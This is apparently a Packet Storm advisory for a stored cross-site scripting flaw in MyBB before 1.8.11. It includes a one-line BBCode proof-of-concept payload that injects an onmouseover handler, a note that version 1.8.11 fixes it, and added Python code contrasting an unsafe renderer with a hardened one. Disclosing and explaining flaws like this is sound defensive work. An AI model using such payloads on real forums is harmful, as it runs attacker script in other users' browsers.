MyBB Cross Site Scripting

2017-04-11T00:00:00
ID PACKETSTORM:142087
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-04-11T00:00:00

Description

#################################  
  
Description:  
============  
  
Product: MyBB  
Homepage: https://mybb.com/  
Vulnerable version: <1.8.11  
Severity: High risk  
  
===============  
  
Proof of Concept:  
  
  
  
=============  
  
  
  
1. Post a thread or reply to any thread, and write:  
  
  
[email=2"onmouseover="alert(document.location)]hover me[/email]  
  
  
Then, when a user's mouse hovers over it, the XSS attack will occur!  
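
The flaw class the PoC relies on, as an added example (not MyBB's code and not part of the original advisory): a hypothetical `[email]` renderer that escapes angle brackets but not quotes before filling a quoted `href`, beside a hardened version that escapes quotes and validates the address. The function names, both regexes and the benign sample post are assumptions made for illustration.

```python
import html
import re

# Hypothetical [email=address]label[/email] pattern; not MyBB's parser.
EMAIL_TAG = re.compile(r"\[email=(.*?)\](.*?)\[/email\]", re.I | re.S)
# Conservative allowlist: no quotes, whitespace or angle brackets can pass.
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def render_unsafe(post):
    """Escapes <, > and & but leaves quotes alone, then fills a quoted href."""
    escaped = html.escape(post, quote=False)
    return EMAIL_TAG.sub(r'<a href="mailto:\1">\2</a>', escaped)


def render_safe(post):
    """Escapes quotes as well, and only links values that look like addresses."""
    escaped = html.escape(post, quote=True)

    def replace(match):
        address, label = match.group(1), match.group(2)
        if not ADDRESS.fullmatch(address):
            return match.group(0)  # stays as escaped, inert text
        return '<a href="mailto:%s">%s</a>' % (address, label)

    return EMAIL_TAG.sub(replace, escaped)


# The advisory's PoC, plus a constructed benign post for comparison.
POC = '[email=2"onmouseover="alert(document.location)]hover me[/email]'
BENIGN = "[email=admin@example.com]mail us[/email]"

if __name__ == "__main__":
    for post in (POC, BENIGN):
        print("unsafe:", render_unsafe(post))
        print("safe:  ", render_safe(post))
```

In the unsafe output the quote closes `href` early and `onmouseover` becomes a second attribute on the anchor; in the safe output the same post is left as escaped text with no markup.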
  
============  
  
Fixed:  
============  
  
This vulnerability was fixed in version 1.8.11  
  
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/  
  
=============  
  
  
Best regards,  
Zhiyang Zeng of Tencent security platform department  
  
  
  